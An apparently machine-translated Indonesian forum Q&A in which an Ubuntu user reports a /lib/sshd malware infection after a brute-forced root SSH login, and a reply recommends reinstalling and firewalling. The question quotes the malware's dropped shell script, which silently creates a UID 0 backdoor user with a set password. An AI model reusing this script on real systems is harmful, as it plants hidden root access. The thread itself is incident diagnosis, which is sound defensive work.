Saya cukup yakin bahwa laptop Ubuntu 13.10 saya terinfeksi semacam malware.
Sesekali, saya menemukan proses / lib / sshd (dimiliki oleh root) berjalan dan mengkonsumsi banyak cpu. Ini bukan server sshd yang menjalankan / usr / sbin / sshd.
Biner memiliki izin --wxrw-rwt dan menghasilkan dan memunculkan skrip di direktori / lib. Yang baru-baru ini dinamai 13959730401387633604 dan melakukan yang berikut
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
Pengguna gusr dibuat oleh malware secara independen, dan kemudian chpasswd hang saat mengkonsumsi 100% cpu.
Sejauh ini, saya telah mengidentifikasi bahwa pengguna gusr juga ditambahkan ke file di / etc /
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
Sepertinya malware membuat salinan semua file ini dengan akhiran "-". Daftar lengkap file / etc / yang dimodifikasi oleh root tersedia di sini .
Selain itu, file / etc / hosts telah diubah ke file ini .
/ Lib / sshd dimulai dengan menambahkan dirinya ke akhir file /etc/init.d/rc.local!
Saya telah menghapus pengguna, menghapus file, membunuh pohon yang diproses, mengubah passwor saya dan menghapus kunci publik ssh.
Saya sadar bahwa saya pada dasarnya kacau, dan kemungkinan besar saya akan menginstal ulang seluruh sistem. Namun demikian, karena saya masuk ke beberapa mesin lain, akan lebih baik untuk setidaknya mencoba menghapusnya, dan mencari tahu bagaimana saya mendapatkannya. Setiap saran tentang cara melakukannya akan sangat dihargai.
Sepertinya mereka masuk pada tanggal 25 Maret dengan login root dengan kasar. Saya tidak tahu bahwa root ssh diaktifkan secara default di Ubuntu. Saya menonaktifkannya dan memasang denyhosts.
Info masuk berasal dari 59.188.247.236, tampaknya di suatu tempat di Hong Kong.
Saya mendapatkan laptop dari EmperorLinux, dan mereka mengaktifkan akses root. Jika Anda memiliki salah satunya dan Anda menjalankan sshd waspadalah.
Linux/Ebury
. Ini sesuatu yang lain, dan mungkin tidak memiliki nama yang ditetapkan. Ebury tidak akan membuat akun pengguna baru, dan akan memodifikasi pustaka bersama yang digunakan oleh openssh, tidak dijatuhkan dalam biner baru bernama sshd.Jawaban:
Pertama, lepaskan mesin itu dari jaringan sekarang!
Kedua, mengapa Anda mengaktifkan akun root? Anda benar-benar tidak boleh mengaktifkan akun root kecuali Anda memiliki alasan yang sangat bagus untuk melakukannya.
Ketiga, ya, satu-satunya cara untuk memastikan Anda bersih adalah dengan melakukan instalasi bersih. Anda juga disarankan untuk memulai dari awal dan jangan kembali ke cadangan, karena Anda tidak pernah bisa memastikan kapan semuanya dimulai.
Saya juga menyarankan agar Anda membuat firewall pada instalasi berikutnya dan menolak semua koneksi yang masuk:
dan kemudian izinkan ssh dengan:
dan JANGAN aktifkan akun root! Tentunya pastikan login root ssh dinonaktifkan.
sumber